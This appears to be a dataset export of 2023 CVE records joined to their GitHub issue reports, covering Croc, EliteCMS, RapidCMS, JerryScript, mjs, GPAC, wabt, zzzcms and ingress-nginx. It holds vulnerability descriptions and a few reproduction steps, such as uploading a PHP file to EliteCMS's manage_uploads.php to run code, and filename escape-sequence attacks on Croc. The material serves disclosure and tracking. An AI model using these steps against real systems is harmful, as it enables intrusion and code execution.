] | The leading three characters of the shared secret are implicitly used to select a common "room name" at the relay so that sender and receiver can find each other (croc.go:827, croc.go:769, croc.go:572, croc.go:483).
When using shared secrets generated by Croc this is fine, because they are formatted just so that the... | Use of Parts of the Shared Secret as Room Name | https://api.github.com/repos/schollz/croc/issues/596/comments | 4 | 2023-09-08T11:39:58Z | 2024-05-20T16:08:51Z | https://github.com/schollz/croc/issues/596 | 1,887,513,001 | 596 |
CVE-2023-43618 | 2023-09-20T06:15:10.693 | An issue was discovered in Croc through 9.6.5. The protocol requires a sender to provide its local IP addresses in cleartext via an ips? message. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/09/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/schollz/croc/issues/597"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schollz:croc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B173A01-5175-444D-9651-68AD4E2C30C2",
"versionEndExcluding": null,
"versionEndIncluding": "9.6.5",
"versionStartExcluding"... | https://github.com/schollz/croc/issues/597 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schollz",
"croc"
] | As a typical part of the Croc protocol (if no explicit `--ip` is passed), the receiver will ask the sender about its locally assigned IP addresses via the `ips?` message (croc.go:792). This message and its reply are sent unencrypted. I assume there is no encryption, because the receiver might still switch the connectio... | Unencrypted "ips?" Message Leaks Information from the Sender Side | https://api.github.com/repos/schollz/croc/issues/597/comments | 4 | 2023-09-08T11:48:36Z | 2024-05-20T16:38:45Z | https://github.com/schollz/croc/issues/597 | 1,887,526,520 | 597 |
CVE-2023-43619 | 2023-09-20T06:15:10.773 | An issue was discovered in Croc through 9.6.5. A sender may send dangerous new files to a receiver, such as executable content or a .ssh/authorized_keys file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/09/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/schollz/cr... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schollz:croc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B173A01-5175-444D-9651-68AD4E2C30C2",
"versionEndExcluding": null,
"versionEndIncluding": "9.6.5",
"versionStartExcluding"... | https://github.com/schollz/croc/issues/593 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schollz",
"croc"
] | If more than one file is transferred via Croc then, before the transfer starts, the receiver only sees a summary line about the files about to be received, like:
Accept 2 files (159 B)? (Y/n)
Only after confirming this dialog the full file reception list will be printed, like:
Receiving (<-[ip]:[port])... | Possible (Concealed) Creation of Files in Dangerous Path Locations | https://api.github.com/repos/schollz/croc/issues/593/comments | 16 | 2023-09-08T11:12:32Z | 2024-07-24T12:45:10Z | https://github.com/schollz/croc/issues/593 | 1,887,469,185 | 593 |
CVE-2023-43620 | 2023-09-20T06:15:10.870 | An issue was discovered in Croc through 9.6.5. A sender may place ANSI or CSI escape sequences in a filename to attack the terminal device of a receiver. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/09/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/schollz/cr... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schollz:croc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B173A01-5175-444D-9651-68AD4E2C30C2",
"versionEndExcluding": null,
"versionEndIncluding": "9.6.5",
"versionStartExcluding"... | https://github.com/schollz/croc/issues/595 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schollz",
"croc"
] | Filenames on Linux can contain arbitrary characters except for the path separator '/'. Thus filenames can also contain possibly dangerous characters like ASCII control codes (newline, linefeed, etc.) or even complete ANSI/CSI terminal escape sequences.
On the Croc receiver side the filenames communicated by the send... | Escape Sequences in Filenames are not Filtered | https://api.github.com/repos/schollz/croc/issues/595/comments | 5 | 2023-09-08T11:29:52Z | 2024-07-24T12:50:32Z | https://github.com/schollz/croc/issues/595 | 1,887,497,669 | 595 |
CVE-2023-43621 | 2023-09-20T06:15:10.950 | An issue was discovered in Croc through 9.6.5. The shared secret, located on a command line, can be read by local users who list all processes and their arguments. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/09/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/schollz/cr... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schollz:croc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B173A01-5175-444D-9651-68AD4E2C30C2",
"versionEndExcluding": null,
"versionEndIncluding": "9.6.5",
"versionStartExcluding"... | https://github.com/schollz/croc/issues/598 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schollz",
"croc"
] | On the sender side a custom shared secret can be specified via the `croc send --code <SECRET>` command line. On the receiver side the shared secret, custom or not, is typically passed on the command line using the `croc <SECRET>` command line . The latter invocation variant is actively advocated by the output displayed... | Shared Secret Passed on Command Line Possibly Leaks to other Local Users | https://api.github.com/repos/schollz/croc/issues/598/comments | 5 | 2023-09-08T11:55:03Z | 2024-05-20T16:48:04Z | https://github.com/schollz/croc/issues/598 | 1,887,535,896 | 598 |
CVE-2023-42331 | 2023-09-20T20:15:11.853 | A file upload vulnerability in EliteCMS v1.01 allows a remote attacker to execute arbitrary code via the manage_uploads.php component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Num-Nine/CVE/issues/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"ur... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:elitecms:elite_cms:1.01:*:*:*:-:*:*:*",
"matchCriteriaId": "6A277BC1-8C5E-49E5-A76C-8E1DFE30420E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/Num-Nine/CVE/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Num-Nine",
"CVE"
] | 1.Loopholes in the http://127.0.0.1/CVE-Target/elitecms/admin/manage_uploads.php
2.Upload an a.php content as <? php phpinfo(); ? >
3.Click add image
4.Go to http://127.0.0.1/CVE-Target/elitecms/uploads/a.php | Any file is uploaded to eliteCMS | https://api.github.com/repos/QianGeG/CVE/issues/2/comments | 0 | 2023-09-04T16:12:33Z | 2023-09-04T16:12:33Z | https://github.com/QianGeG/CVE/issues/2 | 1,880,577,320 | 2 |
CVE-2023-42331 | 2023-09-20T20:15:11.853 | A file upload vulnerability in EliteCMS v1.01 allows a remote attacker to execute arbitrary code via the manage_uploads.php component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Num-Nine/CVE/issues/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"ur... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:elitecms:elite_cms:1.01:*:*:*:-:*:*:*",
"matchCriteriaId": "6A277BC1-8C5E-49E5-A76C-8E1DFE30420E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/Num-Nine/CVE/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Num-Nine",
"CVE"
] | null | Any file is uploaded to eliteCMS1.01 | https://api.github.com/repos/QianGeG/CVE/issues/4/comments | 1 | 2023-09-19T02:52:11Z | 2023-09-19T02:56:23Z | https://github.com/QianGeG/CVE/issues/4 | 1,902,114,633 | 4 |
CVE-2023-36109 | 2023-09-20T22:15:12.750 | Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/Limesss/CVE-2023-36109/tree/main"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5080"
}
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6DB8D818-8F21-4FD3-8D4D-A024A6346CB4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/jerryscript-project/jerryscript/issues/5080 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Version: v3.0.0
###### Build platform
Linux cqian-s2 5.4.0-148-generic #165-Ubuntu SMP Tue Apr 18 08:53:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linu
###### Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-f... | ==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5080/comments | 0 | 2023-05-10T17:32:09Z | 2023-09-22T10:24:05Z | https://github.com/jerryscript-project/jerryscript/issues/5080 | 1,704,361,322 | 5,080 |
CVE-2023-43338 | 2023-09-23T00:15:20.170 | Cesanta mjs v2.20.0 was discovered to contain a function pointer hijacking vulnerability via the function mjs_get_ptr(). This vulnerability allows attackers to execute arbitrary code via a crafted input. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/250"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/cesanta/mjs/issues/250 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # Function Pointer Hijack mjs/mjs.c in mjs_execute
## Affected Projects
mjs 2.20.0 (https://github.com/cesanta/mjs)
## Problem Type
CWE-822 (Untrusted Pointer Dereference)
## Description
I discovered a vulnerability that could potentially lead to function pointer hijacking. I believe this is a logical vulnera... | Function Pointer Hijack mjs/mjs.c in mjs_execute | https://api.github.com/repos/cesanta/mjs/issues/250/comments | 1 | 2023-09-17T15:24:27Z | 2023-09-23T01:24:00Z | https://github.com/cesanta/mjs/issues/250 | 1,899,819,562 | 250 |
CVE-2023-5258 | 2023-09-29T12:15:13.093 | A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /resource/addgood.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/OpenRapid/rapidcms/issues/9"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/4"
},
{
"sou... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/OpenRapid/rapidcms/issues/9 | [
"Issue Tracking"
] | github.com | [
"OpenRapid",
"rapidcms"
] | RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in /resource/addgood.php
For more details, see:
https://github.com/yhy217/rapidcms-vul/issues/4 | SQL injection vulnerability exists in RapidCMS Dev.1.3.1 --3 | https://api.github.com/repos/OpenRapid/rapidcms/issues/9/comments | 0 | 2023-09-18T03:27:14Z | 2023-09-18T09:28:01Z | https://github.com/OpenRapid/rapidcms/issues/9 | 1,900,098,851 | 9 |
CVE-2023-5258 | 2023-09-29T12:15:13.093 | A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /resource/addgood.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/OpenRapid/rapidcms/issues/9"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/4"
},
{
"sou... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/yhy217/rapidcms-vul/issues/4 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yhy217",
"rapidcms-vul"
] |
[Suggested description]
RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in /resource/addgood.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/OpenRapid/rapidcms
[Affected Product Code Base]
RapidCMS Dev.1.3.1
[Affected Component]
File: /resource/a... | SQL injection vulnerability exists in RapidCMS Dev.1.3.1 | https://api.github.com/repos/yhy217/rapidcms-vul/issues/4/comments | 0 | 2023-09-18T03:26:39Z | 2023-09-18T03:26:39Z | https://github.com/yhy217/rapidcms-vul/issues/4 | 1,900,098,176 | 4 |
CVE-2023-5262 | 2023-09-29T14:15:11.163 | A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. Affected by this vulnerability is the function isImg of the file /admin/config/uploadicon.php. The manipulation of the argument fileName leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclose... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/OpenRapid/rapidcms/issues/10"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/5"
},
{
"so... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/OpenRapid/rapidcms/issues/10 | [
"Issue Tracking"
] | github.com | [
"OpenRapid",
"rapidcms"
] | RapidCMS exists arbitrary file upload vulnerability in Icon upload operation
For more details, see:
https://github.com/yhy217/rapidcms-vul/issues/5 | RapidCMS exists arbitrary file upload vulnerability in Icon upload operation | https://api.github.com/repos/OpenRapid/rapidcms/issues/10/comments | 0 | 2023-09-18T09:26:24Z | 2023-09-18T09:27:21Z | https://github.com/OpenRapid/rapidcms/issues/10 | 1,900,525,198 | 10 |
CVE-2023-5262 | 2023-09-29T14:15:11.163 | A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. Affected by this vulnerability is the function isImg of the file /admin/config/uploadicon.php. The manipulation of the argument fileName leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclose... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/OpenRapid/rapidcms/issues/10"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/5"
},
{
"so... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/yhy217/rapidcms-vul/issues/5 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yhy217",
"rapidcms-vul"
] | [Suggested description]
An arbitrary file upload vulnerability in /admin/config/uploadicon.php which allows attackers to getshell
RapidCMS Dev.1.3.1 was discovered to contain an arbitrary file upload vulnerability in /admin/config/uploadicon.php which leads to getshell
[Vulnerability Type]
arbitrary file upload
... | RapidCMS has an arbitrary file upload vulnerability | https://api.github.com/repos/yhy217/rapidcms-vul/issues/5/comments | 0 | 2023-09-18T09:19:43Z | 2023-09-18T09:31:07Z | https://github.com/yhy217/rapidcms-vul/issues/5 | 1,900,514,277 | 5 |
CVE-2023-42298 | 2023-10-12T04:15:13.053 | An issue in GPAC GPAC v.2.2.1 and before allows a local attacker to cause a denial of service via the Q_DecCoordOnUnitSphere function of file src/bifs/unquantize.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/gpac/gpac/issues/2567"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "047BC15F-5E51-48D9-B751-9DC9311FEBCF",
"versionEndExcluding": null,
"versionEndIncluding": "2.2.1",
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2567 | [
"Issue Tracking",
"Patch"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [Y] I looked for a similar issue and couldn't find any.
- [Y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [Y] I give enough info... | Integer overflow issue in bifs/unquantize.c:298 | https://api.github.com/repos/gpac/gpac/issues/2567/comments | 1 | 2023-08-29T07:37:50Z | 2023-10-11T01:35:00Z | https://github.com/gpac/gpac/issues/2567 | 1,871,078,948 | 2,567 |
CVE-2023-45909 | 2023-10-18T23:15:08.300 | zzzcms v2.2.0 was discovered to contain an open redirect vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Num-Nine/CVE/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zzzcms:zzzphp:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "410E39C6-3A1E-4E57-A6F9-CB2A08A76B80",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/Num-Nine/CVE/issues/7 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Num-Nine",
"CVE"
] | Name of the affected product:zzzcms
The affected version:2.2.0
Vulnerability type:Cross-site redirection
1.
Download address:
http://115.29.55.18/zzzphp.zip
http://www.zzzcms.com/a/news/31_313.html
2.
Feel free to register a user after installation
Go to Message management: /? gbook/23
Copy... | zzzcms-V2.2.0 has cross-site redirection vulnerability | https://api.github.com/repos/QianGeG/CVE/issues/7/comments | 0 | 2023-10-09T08:50:13Z | 2023-10-09T08:50:13Z | https://github.com/QianGeG/CVE/issues/7 | 1,932,585,751 | 7 |
CVE-2023-46332 | 2023-10-23T16:15:09.457 | WebAssembly wabt 1.0.33 contains an Out-of-Bound Memory Write in DataSegment::Drop(), which lead to segmentation fault. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/WebAssembly/wabt/issues/2311"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:webassembly_binary_toolkit:1.0.33:*:*:*:*:*:*:*",
"matchCriteriaId": "A9DCC3A8-9035-4F70-B914-493DD3140821",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/WebAssembly/wabt/issues/2311 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"WebAssembly",
"wabt"
] | ### Environment
```shell
OS : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Commit : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison : 12.0.1
Build : mkdir... | Out-of-Bound Memory Write in DataSegment::Drop() | https://api.github.com/repos/WebAssembly/wabt/issues/2311/comments | 0 | 2023-10-08T07:46:31Z | 2023-10-08T18:41:21Z | https://github.com/WebAssembly/wabt/issues/2311 | 1,931,692,043 | 2,311 |
CVE-2023-46331 | 2023-10-23T17:15:08.590 | WebAssembly wabt 1.0.33 has an Out-of-Bound Memory Read in in DataSegment::IsValidRange(), which lead to segmentation fault. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/WebAssembly/wabt/issues/2310"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:webassembly_binary_toolkit:1.0.33:*:*:*:*:*:*:*",
"matchCriteriaId": "A9DCC3A8-9035-4F70-B914-493DD3140821",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/WebAssembly/wabt/issues/2310 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"WebAssembly",
"wabt"
] | ### Environment
```shell
OS : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Commit : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison : 12.0.1
Build : mkdir... | Out-of-Bound Memory Read in DataSegment::IsValidRange() | https://api.github.com/repos/WebAssembly/wabt/issues/2310/comments | 0 | 2023-10-08T07:32:47Z | 2023-10-08T18:41:08Z | https://github.com/WebAssembly/wabt/issues/2310 | 1,931,687,191 | 2,310 |
CVE-2022-4886 | 2023-10-25T20:15:09.790 | Ingress-nginx `path` sanitization can be bypassed with `log_format` directive.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"inte... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/10/25/5"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54E2DB85-1B0E-44DC-928F-28B1E1B74728",
"versionEndExcluding": "1.8.0",
"versionEndIncluding": null,
"versionSta... | https://github.com/kubernetes/ingress-nginx/issues/10570 | [
"Mitigation",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | ### Issue Details
A security issue was discovered in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where a user that can create or update ingress objects can use directives to bypass the sanitization of the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `exten... | CVE-2022-4886: Ingress-nginx `path` sanitization can be bypassed | https://api.github.com/repos/kubernetes/ingress-nginx/issues/10570/comments | 8 | 2023-10-25T15:48:08Z | 2024-03-25T12:20:18Z | https://github.com/kubernetes/ingress-nginx/issues/10570 | 1,961,737,985 | 10,570 |
CVE-2023-5043 | 2023-10-25T20:15:18.037 | Ingress nginx annotation injection causes arbitrary command execution.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/10/25/4"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B1FAA6D4-954E-4E5F-AB9A-61E1A3F9CD9B",
"versionEndExcluding": "1.9.0",
"versionEndIncluding": null,
"versionSta... | https://github.com/kubernetes/ingress-nginx/issues/10571 | [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | ### Issue Details
